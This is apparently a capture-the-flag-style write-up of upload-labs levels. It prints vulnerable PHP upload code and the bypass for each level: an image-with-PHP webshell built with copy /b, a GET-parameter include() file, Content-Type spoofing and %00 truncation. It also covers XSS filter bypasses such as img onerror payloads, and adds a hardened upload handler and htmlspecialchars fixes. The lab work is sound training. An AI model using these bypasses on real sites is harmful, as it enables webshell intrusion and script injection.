Lab
File upload vulnerabilities
Bypassing content checks to upload files
upload-labs-14
    function getReailFileType($filename){
        $file = fopen($filename, "rb");
        $bin = fread($file, 2); // read only the first 2 bytes
        fclose($file);
        $strInfo = @unpack("C2chars", $bin);
        $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
        $fileType = '';
        switch($typeCode){
            case 255216:
                $fileType = 'jpg';
                break;
            case 13780:
                $fileType = 'png';
                break;
            case 7173:
                $fileType = 'gif';
                break;
            default:
                $fileType = 'unknown';
        }
        return $fileType;
    }

    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_type = getReailFileType($temp_file);
        if($file_type == 'unknown'){
            $msg = "文件未知,上传失败!";
        }else{
            $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            } else {
                $msg = "上传出错!";
            }
        }
    }
The file type is decided by reading only the first two bytes.
copy C:\Users\28995\Desktop\1.jpg/b + C:\Users\28995\Desktop\14.php/a C:\Users\28995\Desktop\2.jpg
This command builds the image webshell (a JPEG with the PHP file appended).
The upload succeeds, but the file still has to be parsed as PHP, so an include.php also needs to be written under the upload directory:
    <?php
    $file=$_GET['page'];
    include($file);
    ?>

Then connect with 菜刀 (China Chopper).
upload-labs-15
    function isImage($filename){
        $types = '.jpeg|.png|.gif';
        if(file_exists($filename)){
            $info = getimagesize($filename);
            $ext = image_type_to_extension($info[2]);
            if(stripos($types,$ext)>=0){
                return $ext;
            }else{
                return false;
            }
        }else{
            return false;
        }
    }

    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $res = isImage($temp_file);
        if(!$res){
            $msg = "文件未知,上传失败!";
        }else{
            $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            } else {
                $msg = "上传出错!";
            }
        }
    }
getimagesize() returns the image dimensions and related information: an array on success, or FALSE together with an E_WARNING-level error on failure.
The method from the previous level still works; alternatively, upload the PHP file directly with Content-Type set to image/gif and a GIF file header prepended.
Bypassing whitelist checks to upload files
upload-labs-2
    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists(UPLOAD_PATH)) {
            if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
                if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
                } else {
                    $msg = '上传出错!';
                }
            } else {
                $msg = '文件类型不正确,请重新上传!';
            }
        } else {
            $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
        }
    }

Capture the request and modify the Content-Type directly.
upload-labs-12
    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $ext_arr = array('jpg','png','gif');
        $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
        if(in_array($file_ext,$ext_arr)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
        }
    }

Because $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext; is built by plain string concatenation, %00 truncation can be used.
upload-labs-13
    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $ext_arr = array('jpg','png','gif');
        $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
        if(in_array($file_ext,$ext_arr)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            } else {
                $msg = "上传失败";
            }
        } else {
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
        }
    }

This level is the same as the previous one and 00 truncation works again; the only difference is that save_path is passed via POST.
Change the 33 in front of the 2e (the '.' of the extension) to 00; the upload succeeds.
upload-labs-20
    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
            $file_name = $_POST['save_name'];
            $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
            if(!in_array($file_ext,$deny_ext)) {
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH . '/' .$file_name;
                if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
                }else{
                    $msg = '上传出错!';
                }
            }else{
                $msg = '禁止保存为该类型文件!';
            }
        } else {
            $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
        }
    }

move_uploaded_file() moves an uploaded file to a new location. It returns TRUE on success and FALSE on failure.
The 20 in the figure is the space after "php" in the save name; change it to 00 and the upload succeeds.
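As an added example (not upload-labs code), here is a hardened upload handler that removes the conditions exploited in levels 2, 12, 13, 14, 15 and 20 above. It assumes UPLOAD_PATH is defined by the including page, as in the lab code, and that the web server never executes files with image extensions from that directory.

```php
<?php
// Added example, not upload-labs code. Assumes UPLOAD_PATH is defined by the
// including page (as in the labs) and that the server never executes files
// with image extensions stored in that directory.

// Allow-list keyed by the type getimagesize() reports. The stored extension
// comes from this table, never from the client's file name or Content-Type.
const ALLOWED_IMAGE_TYPES = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

// Returns [bool $is_upload, string $msg]; $msg is the stored name on success.
function safeImageUpload(array $file, string $uploadDir): array {
    // Reject PHP-level upload errors and anything not received as an HTTP upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return [false, 'Upload failed'];
    }
    // Levels 14/15: two magic bytes or a pasted GIF header satisfy those checks.
    // A JPEG with PHP appended still passes getimagesize() too; what keeps it
    // from running is the fixed image extension below plus never handing
    // upload paths to include() (the include.php step in level 14).
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED_IMAGE_TYPES[$info[2]])) {
        return [false, 'Not an allowed image'];
    }
    // Level 2: $_FILES[...]['type'] is client-controlled and is ignored here.
    // Levels 12/13/20: the client controls neither the directory nor the name,
    // so %00 truncation and trailing-space names have nothing to act on.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$info[2]];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!is_dir($uploadDir) || !move_uploaded_file($file['tmp_name'], $dest)) {
        return [false, 'Could not store file'];
    }
    return [true, $name];
}

$is_upload = false;
$msg = null;
if (isset($_POST['submit'], $_FILES['upload_file'])) {
    [$is_upload, $msg] = safeImageUpload($_FILES['upload_file'], UPLOAD_PATH);
}
```

The image-with-PHP file from level 14 still uploads, but it lands under a random .jpg name and is only ever served as an image, so removing the include.php pattern is the other half of the fix.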
XSS
The root cause of XSS is that part of a web page's content varies with external input. If, while the HTML is generated, characters that have special meaning in HTML syntax (metacharacters) are not handled correctly, HTML or JavaScript gets injected, the original HTML structure changes, and the XSS vulnerability we commonly talk about arises.
Basic XSS defense 1
htmlspecialchars() converts a number of predefined characters to HTML entities.
The predefined characters are:
& (ampersand) becomes &amp;
" (double quote) becomes &quot;
' (single quote) becomes &#039; (only when ENT_QUOTES is set)
< (less than) becomes &lt;
> (greater than) becomes &gt;
Example 1
Shows that there is an XSS vulnerability.
Fix: use the htmlspecialchars() function.
Example 2
No popup; viewing the source, the tag is gone.
Use <img src=1 onerror=alert(1)>
or vary the case; both bypass it.
Fix: use the htmlspecialchars() function.
Example 3
Varying the case directly still pops the alert; on inspection the tag is gone.
An i flag was added, making the match case-insensitive.
Doubling the tag still pops the alert.
Fix: use the htmlspecialchars() function.
Example 4
In the source, an error is raised as soon as a <script> tag appears.
<img src=1 onerror=alert(1)> bypasses it.
Fix: still use the htmlspecialchars() function.